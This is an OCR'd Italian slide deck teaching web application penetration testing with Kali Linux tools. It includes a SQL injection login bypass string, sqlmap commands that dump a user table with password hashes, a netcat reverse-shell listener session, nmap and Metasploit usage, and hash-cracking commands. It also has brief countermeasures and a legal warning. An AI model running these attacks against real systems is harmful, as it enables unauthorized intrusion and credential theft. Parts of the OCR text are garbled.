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Gl'anno 2013: 

Aumento del 50% degli attacchi a siti e web application 
14 zero-day 

5.291 nuove vulnerabilità scoperte, 415 di queste per 
dispositivi mobile 

Il 51% degli attacchi colpisce aziende con meno di 250 
dipendenti 

Aumento del 125% dei siti di phishing 



Fonte: Symantec iSTR 
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Kali è una distribuzione basata su Debian pensata per la 
sicurezza informatica e l'informatica forense. 
E' creata e mantenuta da Offensive Security. 

Kali offre una vasta gamma di tools per la sicurezza e il 
penetration test, tra questi: 

Sqlmap, John the ripper, Nmap, Metasploit, Aricrack, Wireshark. 



Perché Kali Linux? 



• Gratis 



• Open Source 

• Grande comunità e aziende alle spalle 

• Supporto ai dispositivi ARM (Android ecc) 
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Kali 


BackBox 


OS: 


Linux 


Linux 


Basato su: 


Debian 


Ubuntu 


Versione: 


1.0.5 


3.09 


Origine: 


USA 


Italia 


Architettura: 


i386, x86_64, ARM 


i386, x86_64 


Desktop: 


Gnome, KDE, XFCE 


XFCE 


Altro: 


Maggior numero di tools 
(alcuni settoriali) 
Maggiori dimensioni 


Minor numero di tools 
(selezionati) 
Minor dimensioni 
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• Infiltrazione 
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• Maintaining Access 



Web Server Scanner - Nikto 
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Fingerprint del web server 
Scansione di file "pericolosi" e script cgi 
Software obsoleto 
Analisi dei metodi http 



Maintaining Access : , " : . " 

mkto -h target.com 
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The anti-clickjacking X-Frame-Options header is not pr 
Cookie JSESSIONID created without the httponly flag 



No CGI Directories foundl (use ' -C all' to force check 



+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, 0P1 
+ OSVDB-397: HTTP method ('Allow' Header) : 'PUT' method c 
ave files on the web server. 

+ OSVDB-5646: HTTP method ('Allow' Header): 1 DELETE 1 may 
files on the web server. 
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Analisi di un'applicazione web: 

• Crawling e mappatura della struttura del sito 

• Sql injection 
•Xss 

• RFI & LFI 

• Login guessing attack 

• Pagine di debug e parametri 

• High 

Cleartext Password over HTTP 1 
SOL Error Detected - Possible SOL Injection 7 
SOL Injection 4 
Cross Site Scripting 2 
Page Fingerprint Differential Detected - 
Possible Locai File Include 
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Un XSS permette di inserire ed eseguire codice lato client al 
fine di attuare un insieme variegato di attacchi quali ad 
esempio: 

• raccolta e manipolazione di informazioni (cookie) 

• visualizzazione e modifica di dati presenti sui server 

• alterazione del comportamento dinamico delle pagine web 

Esistono due tipi di vulnerabilità XSS: 

• stored, quando il codice di scripting viene inserito in 
maniera permanente sul server (es. in un forum); 

• reflected, quando il payload viene iniettato tramite 
richieste del protocollo HTTP effettuate dallo stesso client 
che subisce l'attacco 

(es. un URL creato appositamente) 
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Crawling dei parametri del target 
Analisi di possibili xss 



xsser -u "http://target.com/" -c 1000 — Cw=5 



xsser -u "http://target.com/" -g 
"search . j sp?ti po=rep_cod&text=" --auto 




[*] Final RGSults: 



- Injections: 98 

- Failed: 86 

- Sucessfull : 12 

- Accur: 12 % 
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SQL Injection: permette l'inserimento di codice malevolo 
all'interno di una query SQL e di operare sul Database. 



select * from users where user= ' . $_post[ ' user ' ] . ' 

AND pwd= 4 . $_POST [ ' pwd ' ] ' 

= s = s = s = s = s = s = s = s = s = s = s = s = s = s = s = s = s = 3 = s = s = s = s = s = s = s = s==s=!s = a = s=ss=!s = s=!s = 3==s=!s J 



ì select * from users where user= ' utente ' and pwd=' 'or 

1=1-- 

Attacco a un sistema 11 
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V * » » 
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Analisi dei parametri 

Exploiting -> recupero db, tabelle, colonne, dati 

Eventualmente crack di password 

Eventualmente upload di una shell 

Integrazione con metasploit (shell vnc, privilege excalation) 



sqlmap -u "target.com/search.jsp? 
tipo=rep_cod&text=0001" --dbs 



[18:34:31] [INFO] the back-end DBMS is MySQL 

web application technology: JSP 

back-end DBMS: MySQL 5.0 

[18:34:31] [INFO] fetching database names 

available databases [6] : 

[*] information_schema 

[*] mysql 

[*] pe r f o rmanc e_sc hema 
[*] |shopping_cart 



test 
webauth 
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sqlmap -u "target.com/search.jsp? 
ti po=rep_code&text=0001" -D shoppi ng_cart --tables 



Database: shopping_cart 
[5 tables] 
+ + 

| luseri | 

logs 
j news 

ordini 

prodotti 



sqlmap -u "target . com/search . jsp?ti po=rep_code 
&text=0001" -D shoppi ng_cart -T user --dump 



[INFO] 












[16:41:14] [ INFO] 






'usor' for user 'usor' 






[16:41:14] [INFO] 


postprocess 


ùnq table dump 






Dat abase : shopping^ a rt 
Table: user 










[2 entries] 
























_ T 

1 1 1 codice fise al e 1 Paolo 


1 5 


| paolo .stagno@mail .com 


I 


Stagno | admin 


| Sf 4dcc 3bSdd765d61d8:i27deb882c f99 


(password) | 




2 use re ode 


usor 


1 1 


| use r@user.com 


1 


user | user 


| ee 1 1 c bb 1 9052e40b07aac Oc a060c 23ee 


(user) | 






+----* 




■+ 




■+ - 
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- Contromisure? 
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Escape dei parametri 



SQL 
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- Contromisure? 



scape dei parametri 
iltrare i caratteri 
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- Contromisure? 



scape dei parametri 
iltrare i caratteri 
egexp sui parametri 
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- Contromisure? 



scape dei parametri 
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- Contromisure? 



scape dei parametri 
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- Contromisure? 



scape dei parametri 

iltrare i caratteri 

egexp sui parametri 

rittare le credenziali di accesso 

so di token (sessioni) 

so di captcha 



RFI & Reverse Shell - netcat 
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Tunnelling 

Shell eventualmente reverse (backdoor) 
scanner 

Trasferimento di file 

E molto altro ancora... (simulare un web server) 

netcat -1 -p 666 



IP Address 192.168.56.101 


Port 


666 


root@kjli: m 

File Modifica Visualizza Cerca Terminale Aiuto 


te i i :~# netcat -1 -p 666 

Microsoft Windows XP [Versione 5, 1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 






C : \xampp>echo %username% 

echo %username% 

Admin 






C : \xampp>Q 
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• Cracking delle credenziali 

a» 



Information Cathering - Nmap 



• Scansione delle porte 

Introduzione 
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• Riconoscimento dei servizi 
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nmap -ss target.com -0 
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PORT STATE SERVICE 
80/tcp open http 
135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open mie rosoft -ds 
33G6/tcp open mysql 
8609/tcp open ajp!3 

MAC Address: 08 : 0G : 27 : 2F : 83 : AC (Cadmus Computer Systems) 

Device t ype: general purpose 

Running: |Mic rosoft Windows XP 1 2003 1 

OS CPE: epe :/o:mic rosoft :windows_xp: :sp2: professional cpe:/o: 
OS details: Microsoft Windows XP Professional SP2 or Windows 
Network Distane e: 1 hop 

OS detection performed. Please report any ine or ree t results £ 
Nmap done: 1 IP address (1 host up) scanned in 2.81 seconds 



Exploiting - Metasploit 
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• Scansione automatica del sistema 
operativo, dei servizi e delle vulerabilità 


Attacco a un sistema 


• Exploiting e offuscamento 


Information gathering 
Exploiting 


• Persistenza e Keylogging 
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• Fuzzing di software applicativi 


Conclusioni 


(jj metasploit 
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Interfaccia grafica per metasploit: 

• Permette di navigare comodamente all'interno dei moduli 
degli exploit, i payload e di eseguire tutti gli attacchi 
conosciuti su un sistema. 

• Molto utile quando si effettua il pivoting, permette di 
instradare le connessioni per via grafica 



Li auxiliary 
□ exploit 
Li payload 
B post 
+ □ aix 
a Qj cisco 
+ Qj linux 
+ Qj multi 
+ Li osx 
E Li solaris 

3 dQH 

+; Qj capture 
E Qj escatate 
É D gather 
+ [j manage 




192.168.57.18 192. 168. 57. 8 192.168.57.1 10.10.10.189 10.10. 10. 18B 

SSH jiokol:joihrocka (192.168.57.16:22) NT *UI MORI TY\ SYSTEM @ WS3 
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Password e hash cracker 

John the Ripper è uno tra gli "storici" 
software per gli attacchi offline alle 
password; può funzionare con due 
metodi: il classico brute force oppure 
un attacco basato su un dizionario 



JOHN 
FttSSt/VORD 

UNSHADOW 
DICT10NARY 
NTIM 
HASH 
RLUE 

BRUTEFORCE 
NCREMBsflAL 
POLICY 
R4RALUEL 



CRACK 



john — wordli st=wordli st . txt hash.txt — format=nt 



Loaded 2 password hashes with no d 
kebappl (webapp)l 
guesses: 1 time: 0:00:00:00 DONE 
: lpiZ - caidoz 

Use the "--show" option to display 
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Password cracker con migliore risposta sul bruteforce 
e supporto alla gpu 



hashcat -a 3 -m 1000 admin_hash -1 ?l?u?d 

?1?1?1?1?1?1 



Input .Mode: Mask (?1?1?1?1?1) 

Index : 0/1 (segment), 916132832 (words) , 0 (bytes) 

Recovered.: G/l hashes, 0/1 salts 

Speed/sec . : - plains, 16.28M words 

Progress..: 291206852/916132832 (31.79%) 

Running...: 00:00:00:18 

Estimated.: 00:00:00:38 

82227d735f052b4764ca74dae8507dla |a4vR5| 
AH hashes have been recovered 



Slide statistiche 
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Confronto delle prestazioni tra alcuni dei principali programmi per il crack 
di hash. 

Configurazione computer: 



Attacco a una webapp AMD FX 6100 < 6 core @3 ' 3GHz >' AMD HD597 ° 
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MH/s 
10000000 
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1000000 
100000 
10000 
1000 
100 
10 




JohnTheRipper 

Hashcat 

OdHashcat 

RainbowTable 

RainbowTable 
Precorri puted 



MD5 



Raccomandazione: 

Art. 615 del codice penale 

L'accesso abusivo ad un sistema informatico o telematico è il reato di chi 
abusivamente si introduce in un sistema informatico o telematico protetto 
da misure di sicurezza ovvero vi si mantiene contro la volontà espressa o 
tacita di chi ha il diritto di escluderlo. 

La pena ordinaria prevista per il delitto è la reclusione fino a 3 anni. 

La pena è la reclusione da uno a cinque anni se: 

• il fatto è commesso con abuso dei poteri o con violazione dei doveri 
inerenti alla funzione o al servizio; 

• il colpevole è palesemente armato 

• dal fatto deriva la distruzione o il danneggiamento dei dati, delle 
informazioni o dei programmi in esso contenuti. 

La pena è inoltre da 1 a 5 anni se i fatti previsti al comma I riguardano 
sistemi informatici o telematici di interesse militare o relativi all'ordine 
pubblico o alla sicurezza pubblica o alla sanità o alla protezione civile o 
comunque di interesse pubblico. 
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te provare: 

Shopping Cart 

http://goo.gl/IXhCra 

Hack.me 

http://hack.me/ 

Damn Vulnerale Web Application 

http://dvwa.co.uk/ 

OWASP WebGoat Project 
NOWASP (MutiUidae) 



Domande? 
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\Qdsec 

"Some things in life are unpredictable, 
your application doesn't have to be one of them 1 
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